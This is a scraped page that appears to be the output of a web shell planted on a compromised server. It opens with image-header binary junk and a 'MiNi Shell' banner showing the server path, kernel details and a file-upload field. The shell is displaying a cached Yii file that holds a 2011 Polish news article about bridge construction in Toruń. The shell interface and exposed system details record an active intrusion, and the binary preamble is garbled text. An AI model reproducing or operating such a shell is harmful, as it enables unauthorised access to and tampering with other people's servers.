JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/frontend/runtime/cache/e9/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/frontend/runtime/cache/e9/e9fb603be1f351974dd2e01fe2d4c690.bin

a:2:{i:0;a:2:{i:0;s:8818:" 
                    
                    <h3 class="title" itemprop="headline">Most w lutym</h3>
                    <p><span class="glyphicon glyphicon-time" aria-hidden="true"></span> <strong itemprop="datePublished"> 09-03-2011, 00:00</strong>
                        <meta itemprop="dateModified" content=" 09-03-2011, 00:00"/>
                        <div class="hide" itemprop="description">
	Tegoroczne ambitne plany Strabaga nie pozwalają nawet na jeden dzień zwłoki. Budowniczowie testują wbite wcześniej pale, nie zaniedbując przy tym prac rozbi&oacute;rkowych i porządkowych.</div>
                        <div class="hide" itemprop="publisher" itemscope itemtype="https://schema.org/Organization">
                            <meta itemprop="name" content="budowa.org">
                            <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject">
                                <meta itemprop="url" content="https://www.budowa.org/images/loga/budowa.jpg">
                            </div>
                        </div>
                        <div class="hide" itemprop="image" itemscope itemtype="https://schema.org/ImageObject">
                            <meta itemprop="url" content="https://common.v-manager.pl/">
                        </div>
                        <meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="https://www.budowa.org/artykuly/szczegoly/41187"/>
                        
                                        </p>

                    <div class="lorem">
                        <p>
	<strong>Tegoroczne ambitne plany Strabaga nie pozwalają nawet na jeden dzień zwłoki. Budowniczowie testują wbite wcześniej pale, nie zaniedbując przy tym prac rozbiórkowych i porządkowych.</strong></p>
<p>
	<strong>Testów ciąg dalszy</strong></p>
<p>
	Podniesiony poziom wody w Wiśle utrudniał prace wykonywane na samym brzegu rzeki. Wykonawca był zmuszony do podniesienia poziomu dróg dojazdowych do prawobrzeżnego placu budowy na wysokości ul. Winnica oraz do odbudowy uszkodzonych dróg technologicznych. W związku z tym wstrzymano rozpoczęcie prac przy budowie wyspy centralnej w korycie rzeki. W lutym zaczęły się pierwsze intensywne testy przyszłej konstrukcji trasy mostowej. Przy pomocy specjalistycznego sprzętu wykonywane są testy statyczne i dynamiczne wbitych już pali po obu stronach Wisły. Robotnicy nakładają na istniejący układ pali specjalną konstrukcję złożoną ze stalowych belek i elementów kotwiących. Jest ona wyposażona w siłowniki hydrauliczne do wprowadzania obciążenia oraz sprzęt pomiarowy, który pozwala zarejestrować wyniki testów. Na prawym brzegu powstaje właśnie wykop, w którym zostaną umieszczone palownicę na odpowiednim poziomie. Po drugiej stronie Wisły trwa intensywna wycinka drzew. Po oczyszczeniu terenu Generalny Wykonawca uzyska przestrzeń dla robót budowlanych przy skrajnej podporze przyszłego mostu.</p>
<p>
	<strong>Porządkują, składują…</strong></p>
<p>
	Z obu placów budowy robotnicy wywożą wycięte drzewa i gruz z rozbiórek budynków. Trwają prace związane z usuwaniem kolizji energetycznych i budową urządzeń elektroenergetycznych (od ul. Rudackiej do ul. Łódzkiej), likwidacją kolizji teletechnicznych (pl. Daszyńskiego), a także z budową i niezbędną przebudową istniejących elementów kanalizacji deszczowej i sanitarnej (ul. Żółkiewskiego i ul. Szosa Lubicka). Na obu placach budowy przygotowywane są materiały do wykopów głębokich. Trwa też dowożenie na plac budowy stalowych grodzic. W przyszłości zostaną one umieszczone w gruncie w postaci szczelnych ścianek, zapewniając stabilność fundamentów podpór, a także wyspy centralnej.</p>
<p>
	<strong>Zima im niestraszna?</strong></p>
<p>
	Niskie temperatury utrudniają budowę, jednak na szczęście Generalny Wykonawca potrafi tak zorganizować prace, aby nie stracić ani jednego dnia. Lutowe mrozy Strabag wykorzystał na próbne palowanie na tych terenach, które zwykle są podmokłe. Ale co będzie dalej, jeśli temperatura nadal będzie spadać?</p>
<p>
	- Na pewno mróz -15, -20 stopni jest przeszkodą dla prac związanych z pewnymi technologiami wrażliwymi na mróz – mówi Andrzej Żyder, kierownik kontraktu. – Prac przy budowie jest jednak dużo i są różnorodne, więc na pewno będziemy mieli co robić.</p>
<p>
	<strong>Zobacz sam!</strong></p>
<p>
	Już od marca będzie można oglądać plac budowy nowego mostu, bez wychodzenia z domu. Firma Strabag, zgodnie z zapisem w specyfikacji zamówienia, uruchomi kamerę, która umożliwi obserwowanie postępów prac toruńskiej inwestycji. Obraz emitowany za pomocą kamery zainstalowanej przez firmę Strabag na placu Daszyńskiego będzie można oglądać na stronach <a href="http://www.strabag-most-torun.pl" target="_blank" rel="noopener">www.strabag-most-torun.pl</a>, <a href="http://www.most.torun.pl" target="_blank" rel="noopener">www.most.torun.pl</a>, <a href="http://www.mzd.torun.pl" target="_blank" rel="noopener">www.mzd.torun.pl</a> i <a href="http://www.linkpr.pl" target="_blank" rel="noopener">www.linkpr.pl</a>. Już wkrótce internauci obejrzą jedno z największych przedsięwzięć projektu mostowego: zmianę placu Daszyńskiego w nowoczesny, trzypoziomowy węzeł drogowy.</p>
<p>
	<strong>Most znów w „Mostach”</strong></p>
<p>
	Toruńską przeprawę opisano m.in. na łamach ogólnopolskiej prasy branżowej. W poprzednim numerze czasopisma „Mosty” ukazał się artykuł o naszej największej inwestycji. W kolejnym zaś (nr 2/2011), wydanym pod koniec lutego, zamieszczono rozmowę z Generalnym Wykonawcą toruńskiego mostu. Opisuje on m.in. tegoroczne plany związane z budową i opowiada, co już udało się zrobić. Zdradza też, jakie wymiary będzie miała sztuczna wyspa, która… już wkrótce powstanie na Wiśle! Cały wywiad można przeczytać na stronie <a href="http://www.mosty.elamed.pl" target="_blank" rel="noopener">www.mosty.elamed.pl</a></p>                        
                         


                           
                    </div>
                    
                    <div class="text-center">
                                        </div>

                                            
                      
                        
                        
                    
                                        
                                            <div class="nav-table tags mt05">
                            <div>Tagi:</div>    
                            <div>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=Strabag" class="label label-default">Strabag</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=Toruń" class="label label-default">Toruń</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=budowa+mostu" class="label label-default">budowa mostu</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=most" class="label label-default">most</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=most+w+Toruniu" class="label label-default">most w Toruniu</a>
                                                            </div>
                        </div>
                                            
                        
                    <div id="fb-root"></div>
                    <!--script async defer crossorigin="anonymous" src="https://connect.facebook.net/pl_PL/sdk.js#xfbml=1&version=v12.0" nonce="2g9iczzS"></script-->
                    
<script>
//<![CDATA[
var lx=!1;window.addEventListener("scroll",function(){(0!=document.documentElement.scrollTop&&!1===lx||0!=document.body.scrollTop&&!1===lx)&&(!function(){var e=document.createElement("script");e.type="text/javascript",e.async=!0,e.src="https://connect.facebook.net/pl_PL/sdk.js#xfbml=1&version=v12.0";var a=document.getElementsByTagName("script")[0];a.parentNode.insertBefore(e,a)}(),lx=!0)},!0);
//]]>
</script>
                    
                    <div class="social text-center mb1">
                        <div class="fb-like" data-href="https://www.budowa.org/artykuly/szczegoly/41187_most-w-lutym" data-width="" data-layout="button" data-action="like" data-show-faces="false" data-share="true"></div>
                    </div>

                    
                    <div id="articles">    
                        
                    
                                    ";i:1;N;}i:1;O:25:"yii\caching\TagDependency":3:{s:4:"tags";a:2:{i:0;s:13:"article_41187";i:1;s:8:"articles";}s:4:"data";a:2:{s:32:"84130a3c86e052600b741969c7c701d5";s:21:"0.43803900 1746471582";s:32:"9f4ebfa1b76d6bc6617aec9034853422";s:21:"0.22954000 1749980350";}s:8:"reusable";b:0;}}

Creat By MiNi SheLL
Email: jattceo@gmail.com